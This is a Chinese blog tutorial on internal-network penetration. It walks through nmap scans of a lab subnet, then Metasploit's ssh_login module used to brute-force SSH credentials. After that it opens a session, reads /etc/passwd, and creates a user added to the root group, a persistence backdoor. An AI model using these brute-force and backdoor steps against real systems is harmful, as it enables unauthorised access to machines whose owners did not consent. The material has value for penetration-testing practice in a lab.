美文网首页闻风拾水信息安全
内网渗透之扫描与SSH暴力破解

内网渗透之扫描与SSH暴力破解

作者: 逍遥呀 | 来源:发表于2017-03-28 13:08 被阅读1888次

扫描局域网存活主机

注意:以下使用的ip地址为我部署的环境网段,如果你在看本文,请灵活的进行学习以及使用。目标主机=靶机

nmap -sP 192.168.1.0/24

扫描靶机的操作系统以及版本号

nmap -O 192.168.1.111

扫描靶机的应用程序以及应用程序的版本号

nmap -sV 192.168.1.111

利用msf ssh_login模块暴力破解靶机ssh密码

先打开MSF 进入ssh_login模块 show options查看提示

使用ssh_login模块

use auxiliary/scanner/ssh/ssh_login

设定靶机IP

set RHOSTS 192.168.1.111

设置账号文件/设置账号

你可以设置账号,但是只尝试这一个,建议你使用账号文件

#设置账号
set USERNAME root
#设置账号文件
set USER_FILE 密码文件

设置密码文件/设置密码

你可以设置密码,但是只尝试这一个,建议你使用密码文件

#设置密码
set PASSWORD 123456
#设置密码文件
set PASS_FILE 密码文件

运行

你既可以使用run也可以使用exploit

会话

查询会话方面的信息

sessions -i

打开会话

#打开id为1的会话 输入ifconfig查询ip 成功
sessions -i 1

查看密码文件

cat /etc/passwd

添加用户设置密码并添加到root组

useradd admin123
passwd admin123
usermod -g root admin123

逍遥's Blog

相关文章

  • 内网渗透之扫描与SSH暴力破解

    扫描局域网存活主机 注意:以下使用的ip地址为我部署的环境网段,如果你在看本文,请灵活的进行学习以及使用。目标主机...

  • 入门安全

    SSH暴力破解 Medusa, hydra 内网arp欺骗 推送 JS脚本 扫描端口nmap, MESSCAN, ...

  • ssh隧道用于调试

    相关阅读 SSH隧道与端口转发及内网渗透 | 个人博客 SSH隧道技术----端口转发,socket代理 | 博客...

  • sqlmap从入门到精通-第五章-5-6 内网与外网MSSQL口

    5.6 内网与外网MSSQL口令扫描渗透与防御 地址:https://cloud.tencent.com/deve...

  • 内网渗透扫描神器 Perun

    Perun是一款主要适用于乙方安服、渗透测试人员和甲方RedTeam红队人员的网络资产漏洞扫描器/扫描框架,它主要...

  • ssh远程登陆破解

    利用ssh协议 暴力破解ssh密码

  • 主动扫描-二层ARP发现

    一.基础概念 二层发现,数据链路层,使用ARP协议使用场景:已经取得一台主机,进入内网,对内网进行渗透优点:扫描速...

  • ssh隧道

    ssh隧道的通讯过程是加密的,在内网渗透中,可以在一定程度上保护自己不被安全设备发现,以下介绍ssh隧道的3种工作...

  • 内网渗透之纵深

    前言 在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。 使用--os-shell命令,填写绝对路...

  • 每日安全资讯(2020-07-27)

    内网信息收集与上传下载可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿...

网友评论

    本文标题:内网渗透之扫描与SSH暴力破解

    本文链接:https://www.haomeiwen.com/subject/oqsjottx.html